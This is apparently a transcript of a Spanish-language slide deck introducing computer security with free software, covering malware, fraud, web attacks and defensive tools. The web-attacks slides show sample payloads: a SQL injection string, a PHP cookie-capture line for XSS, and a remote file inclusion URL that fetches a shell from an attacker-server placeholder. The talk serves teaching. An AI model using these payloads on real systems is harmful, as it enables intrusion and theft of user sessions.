Seguridad informatica Con Software Libre
-
Upload
juan-salas-santillana -
Category
Technology
-
view
1.142 -
download
1
description
Transcript of Seguridad informatica Con Software Libre
Seguridad Informatica con Software Libre
Juan Alfredo Salas Santillana
AGENDA
¿Seguridad Informatica?
Nivel Usuario
- Tipos de Amenazas - Algunos Numeros
- Medidas Basicas a Tomar
Nivel Administrador, Desarrollador – Servidores
- Tipos de Ataques - Factores Fisicos y Otros
- Medidas Basicas a Tomar - Como Ocultarte
Algunas Demostraciones
Ethical Hacking
Recomendaciones
¿Seguridad Informatica?
Integridad
Confidencialidad
Disponibilidad
No Repudio
Tipos de Amenazas
Malware
Fraudes
Amenazas: Malware
VirusKeyloggersTroyanosGusanosSpywareRootkits
Malware: Virus
Destruccion
Replicación mediante usuario
Malware: Keyloggers
Capturan:
-Pulsación de Teclas
-Clicks del Mouse
Malware: Troyanos
Era un Metodo de Infección
Procesos Ocultos
Administración Remota
Se Juntan con Aplicaciones Utiles
Malware: Gusanos
Autoreplicacion
Autopropagación
Aprobechan bugs
Malware: Spyware
Recolectan:
Cache, Contraseñas
Usualmente son barras
Malware: Rootkits
- Consiguen: Privilegios
- Permiten Correr Programas como Root (Administrador)
Amenaza: Fraude
Phishing
Phraming
Skimming
Ingenieria Social Como Tal
Fraude: Phishing
Pesca Victimas
Robar Información
Por: Email (SPAM)
Fraude: Pharming
Envia a una Pagina falsa
Modifica:
”Hosts”
”Cache de DNS”
Fraude: Skimming
Clonación de Tarjetas
Mediante Cajeros
Fraude: Ingenieria Social
Usar la Palabra para convencer
Principios: A Todo nos Gusta que nos Alagen
No nos Gusta Decir ”NO”
Siempre un Gesto de Confianza
Medidas Basicas
Antivirus
Firewall
Filtro AntiSpam
Medidas Basicas: Antivirus
CLAMAV
- Plataforma: Windows- Licencia: GPL- Monitoreo Permanente- Actualizaciones Frecuentes- No Consume Mucha Memoria
Dr. Web (Livecd)
- Plataforma: GNU / Linux- Licencia: GPL- Modo: Booteo- Analiza fuera de Windows
Medidas Basicas: Firewall
Aislamiento
Registro de Uso
Reglas de Transmision
Algunos Numeros
Virus Indetectable: $100 - $300
Cuenta de Correo Robado: $10 - $100
Tarjeta de Credito Robada: $1000
Tipos de Ataques
DOS
Mediante Web
Explotación de bugs
Ataques: DOS
Tratan de Colapsar un Servicio
Algunos Abren Gran Cantidad de sockets
Algunos Realizados Desde una ”Netbot”
Ataques: Mediante Web
Inyeccion SQL
Filtrado Incorrecto de Variables
Ejemplo: '' OR '1'='1'
XSS
Filtrado Incorrecto de Etiquetas
No Afecta en si al Servidor, Solo al Usuario
Ejemplo: $cookie = $_GET[\'cookie\'];
Ataques: Mediante Web
CSRF
Explota la Confianza de la Aplicacion a un Usuario
RFI
Explotable por la mala programacion de ”Include()”Ejemplo: http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls
Ataques: Explotacion de Bugs
Usan Vulnerabilidades conocidas
Se corre un script
Puede ser Relizado por un Aprendiz
Medidas Basicas
Firewall
Test de Penetración
Filtrado de Variables
Medidas Basicas: Firewall
IPTABLES
Incluido en el Kernel Linux
Registro de Logs
FIRESTARTER
Licencia: GPL
Facil manejo y configuración
Medidas Basicas: Test de Pentración
NMAP
Escaner de puertos, SO y mas.
Licencia: GPL
METASPLOIT F.
Framework que permite explotar vulnerabilidades.
NESSUS
Escaner de vulnerabilidades
Medidas Basicas: Filtrado de Variables
Factores Fisicos y Otros
Incendios
Inundaciones
Robo Fisico
Defectos y Daños de Hardware
Como Ocultarte
Tor
Algunas Demostraciones
Ethical Hacking
Pasion
Libertad
Conciencia Social
"Ningún problema debería resolverse 2 veces"
Recomendaciones
Nada es 100% Seguro
Filtrar tu Informacion
Encripta tu Informacion
Revisa tus Logs
Nunca Pienses que Nadie se Tomara el Trabajo de Hacerlo